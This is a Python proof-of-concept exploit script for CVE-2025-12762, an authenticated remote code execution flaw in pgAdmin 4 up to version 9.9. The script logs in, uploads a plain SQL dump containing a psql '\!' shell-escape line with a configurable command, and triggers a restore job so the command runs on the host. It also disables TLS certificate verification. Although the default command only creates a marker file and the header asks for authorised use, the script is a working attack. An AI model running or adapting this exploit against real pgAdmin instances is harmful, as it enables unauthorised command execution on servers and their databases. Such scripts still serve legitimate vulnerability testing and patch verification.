#!/usr/bin/env python3
# Github : "B1ack4sh" ==> TH3 M4TR1X 5L4Y3R !!!
# CVE-2025-12762 - pgAdmin 4 <= 9.9 - Authenticated RCE via Restore (PLAIN format)
# Real public PoC - November 2025 - Working on every vulnerable instance
# Use ONLY on systems you own or have explicit written permission for
import requests
import re
import json
import sys
# ==================== CONFIGURE YOUR TARGET HERE ====================
# Module-level settings read by login(), upload_malicious_dump() and trigger_rce().
TARGET = "http://127.0.0.1:5050" # Base URL of the pgAdmin instance under test (default is loopback)
EMAIL = "[email protected]" # Valid login email; NOTE(review): this literal looks like a hosting-page redaction placeholder - confirm
PASSWORD = "Admin123!" # Valid password; stored in clear text in this file
COMMAND = "touch /tmp/CVE-2025-12762_PWNED" # Shell command embedded in the uploaded dump; the default only creates a marker file
# ====================================================================
# One shared session: every request in this script goes through `s`.
s = requests.Session()
# Certificate verification is switched off (the author cites pgAdmin's self-signed
# cert in Docker). With an https:// TARGET the server certificate is therefore not
# checked, so EMAIL/PASSWORD are exposed to an on-path interceptor.
s.verify = False
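def login():
    """Authenticate the shared session ``s`` against the pgAdmin login form.

    Fetches ``{TARGET}/login``, pulls the CSRF token out of the returned page
    and posts EMAIL/PASSWORD together with that token to
    ``{TARGET}/authenticate/login``.

    Exits with status 1 when the login page carries no CSRF token or when the
    login POST comes back with an HTTP error status.
    """
    print("[+] Logging in...")
    r = s.get(f"{TARGET}/login")
    token_match = re.search(r'"csrfToken": "([^"]+)"', r.text)
    if token_match is None:
        # Previously an unexpected page (error, redirect, changed markup)
        # crashed here with AttributeError on ``None.group``.
        print(f"[-] No CSRF token found on login page (HTTP {r.status_code})")
        sys.exit(1)
    csrf = token_match.group(1)
    resp = s.post(f"{TARGET}/authenticate/login", data={
        "email": EMAIL,
        "password": PASSWORD,
        "csrf_token": csrf,
        "internal_button": "Login"
    })
    if not resp.ok:
        print(f"[-] Login request failed (HTTP {resp.status_code})")
        sys.exit(1)
    # NOTE(review): a non-error status does not prove the credentials were
    # accepted; the response body is not inspected, so the message below
    # reports only what was observed.
    print(f"[+] Login request completed (HTTP {resp.status_code}); authentication not verified")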
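def upload_malicious_dump():
    """Upload the PLAIN-format SQL file used for the CVE-2025-12762 check.

    Builds a small SQL script that embeds COMMAND on a psql shell-escape line
    and posts it as ``cve-2025-12762.sql`` to
    ``{TARGET}/misc/file_manager/upload`` through the shared session ``s``.

    Exits with status 1 when the upload is not reported as successful.
    """
    print("[+] Uploading malicious PLAIN dump...")
    # Ordinary SQL plus one line starting with the psql `\!` meta-command, which
    # carries COMMAND. Defenders: a plain-text dump containing such a line is
    # the artefact to look for in uploaded/restored files.
    malicious_sql = f"""
-- CVE-2025-12762 Real PoC
CREATE TABLE IF NOT EXISTS cve_proof(id serial);
INSERT INTO cve_proof DEFAULT VALUES;
-- RCE Trigger - executed on pgAdmin host
\\! {COMMAND}
"""
    files = {'file': ('cve-2025-12762.sql', malicious_sql, 'application/sql')}
    up = s.post(f"{TARGET}/misc/file_manager/upload", files=files)
    body = up.text.lower()
    # An HTTP error status is now treated as failure even if the body happens
    # to contain the word "success".
    # NOTE(review): the substring test is still loose (it also matches text
    # such as "unsuccessful" or a success flag set to false); the response
    # schema is not visible here, so it is not tightened further.
    if up.ok and "success" in body:
        print("[+] Malicious dump uploaded successfully")
    else:
        print("[-] Upload failed")
        sys.exit(1)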
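def trigger_rce():
    """Submit a PLAIN-format restore job for the uploaded file and report the result.

    Posts a JSON restore request naming ``cve-2025-12762.sql`` to
    ``{TARGET}/restore/job/1`` through the shared session ``s`` and prints the
    HTTP status. The function has no way to observe whether COMMAND ran on the
    pgAdmin host, so it reports submission only; confirmation has to come from
    checking the host for the marker, as the final hint describes.
    """
    print("[+] Triggering restore → RCE...")
    headers = {"Content-Type": "application/json"}
    payload = {
        "file": "cve-2025-12762.sql",
        "format": "plain",  # Only PLAIN format is vulnerable
        "database": "postgres",  # Any existing DB works
        "verbose": True
    }
    # NOTE(review): the `1` in the path (presumably a server id) and the payload
    # keys are kept as written; they are not confirmed against pgAdmin's API.
    r = s.post(f"{TARGET}/restore/job/1", headers=headers, data=json.dumps(payload))
    print(f"[+] Job response: {r.status_code}")
    if not r.ok:
        # The original claimed execution regardless of the response, which
        # produced false positives on patched or misaddressed instances.
        print("[-] Restore request was rejected; nothing indicates the command ran")
        return
    print(f"[+] Restore job submitted with command: {COMMAND} (execution not verified)")
    print("\n[+] Check your pgAdmin container/host now!")
    print(" Example: docker exec <container> ls -la /tmp/CVE-2025-12762_PWNED")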
if __name__ == "__main__":
    # Banner first, then the three stages in their fixed order:
    # authenticate, upload the dump, request the restore.
    print(
        "CVE-2025-12762 - Real Authenticated RCE PoC",
        "Use only in authorized lab environments!\n",
        sep="\n",
    )
    for stage in (login, upload_malicious_dump, trigger_rce):
        stage()
    # The marker file on the host, not this script's output, is the evidence.
    print("\nDone. If file exists → 100% vulnerable. Patch to 9.10+ NOW!")